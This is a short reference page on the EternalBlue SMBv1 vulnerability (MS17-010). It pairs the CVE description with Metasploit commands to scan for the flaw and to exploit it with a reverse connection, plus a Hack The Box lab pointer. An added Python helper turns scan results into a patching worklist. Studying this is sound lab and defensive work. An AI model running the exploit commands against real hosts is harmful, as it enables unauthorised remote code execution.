MS17-010

Exploit for Microsoft Server Message Block 1.0 (SMBv1) - Unauthenticated Remote Code Execution (EternalBlue, MS17-010, CVE-2017-0144)

Description:

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka “Windows SMB Remote Code Execution Vulnerability.”

Affected Products:

Proof of Concept

PoC exploit

Metasploit Module

Check with Metasploit

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS YOUR_TARGET
set THREADS 25
run
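Added example (not part of the original page or of the Metasploit project): a Python helper that turns the scanner's console output into a remediation worklist, with hosts showing signs of compromise listed first. The sample output is constructed, the message wording it matches is an assumption about the module's usual output, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample of scanner console output (documentation-range addresses).
SAMPLE_OUTPUT = """\
[+] 192.0.2.10:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[-] 192.0.2.11:445 - Host does NOT appear vulnerable.
[*] Scanned 2 of 4 hosts (50% complete)
[+] 192.0.2.12:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[!] 192.0.2.12:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x1A2B3C4D
[-] 192.0.2.13:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] Scanned 4 of 4 hosts (100% complete)
"""

# Per-host lines look like "[tag] ip:port - message"; progress lines carry no address.
LINE = re.compile(
    r"^\[(?P<tag>[+\-!*])\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+(?P<msg>.*)$"
)
PRIORITY = {"compromised": 0, "vulnerable": 1, "inconclusive": 2, "not_vulnerable": 3}

def triage(output):
    """Map each scanned host to a status and, when reported, its OS string."""
    hosts = defaultdict(lambda: {"status": "inconclusive", "os": None})
    for line in output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # progress or banner line, not tied to a host
        entry, msg = hosts[m["host"]], m["msg"]
        if "INFECTED with DoublePulsar" in msg:
            entry["status"] = "compromised"  # implant indicator outranks any other result
        elif "likely VULNERABLE" in msg:
            if entry["status"] != "compromised":
                entry["status"] = "vulnerable"
            entry["os"] = msg.split(" - ", 1)[1] if " - " in msg else None
        elif "does NOT appear vulnerable" in msg and entry["status"] == "inconclusive":
            entry["status"] = "not_vulnerable"
    return dict(hosts)  # hosts with only error lines stay "inconclusive" and need a rescan

def worklist(output):
    """Hosts needing action, most urgent first: incident response, patching, rescan."""
    actionable = [(h, r) for h, r in triage(output).items() if r["status"] != "not_vulnerable"]
    return sorted(actionable, key=lambda item: (PRIORITY[item[1]["status"]], item[0]))
```

Feed it the text saved from a scan run; a host that only produced connection or login errors is reported as inconclusive rather than silently dropped.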

Exploit with Metasploit

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS YOUR_TARGET
set LHOST eth0
set LPORT 1337
run

Try the exploit in a lab environment:

Lab: Hack The Box
Machine: Blue

References:

https://nvd.nist.gov/vuln/detail/CVE-2017-0144
https://learn.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/smb/smb_ms17_010.md
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/ms17_010_eternalblue.md
https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010